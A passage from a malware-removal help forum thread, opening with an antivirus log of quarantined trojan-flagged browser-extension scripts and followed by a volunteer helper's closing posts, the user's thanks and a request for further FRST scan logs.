sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Guest\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=AD7EDC8E835EFAEADD238D29D8C5C7B551E47EFB ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\dofeolkodenpakpecclcppljibhmbeam\1.0\k9OmTM.js.vir"
sh=0E0790A0A5CCDF84ABE241B15372B28086A31657 ft=0 fh=0000000000000000 vn="JS/Kryptik.ATB trojan" ac=I fn="C:\Qoobox\Quarantine\C\Users\Rainsford\AppData\Local\Torch\User Data\Default\Extensions\ibafobgmkbhcmfacpkkmfoehplhhcplc\1.1\QWhBv4.js.vir"
sh=17163F51304FE6F67830F6E86D8CBF55ADFC24CF ft=1 fh=6d4bb48ee88ff6fa vn="a variant of Win32/AdkDLLWrapper.A potentially unwanted application" ac=I fn="C:\Users\Rainsford\AppData\Roaming\BitTorrent\updates\7.9.0_30659.exe"
 



#12 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 12 October 2015 - 09:40 AM

This is looking very good. No more active malware or adware has been found. :)

How is the computer running now?
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#13 Rainsford

Rainsford
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:34 AM

Posted 12 October 2015 - 05:52 PM

Seems to be working fine now. Thank you so much for your help. You are a wonderful person for taking time out of your life to help people. Thank you for everything =)



#14 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 13 October 2015 - 02:37 AM

You are welcome.

Step 1

frst.pngfrstscan.png

Start FRST with administator privileges.
  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#15 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:02:34 PM

Posted 16 October 2015 - 05:39 AM

Hi,

3 Day Inactivity

this is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users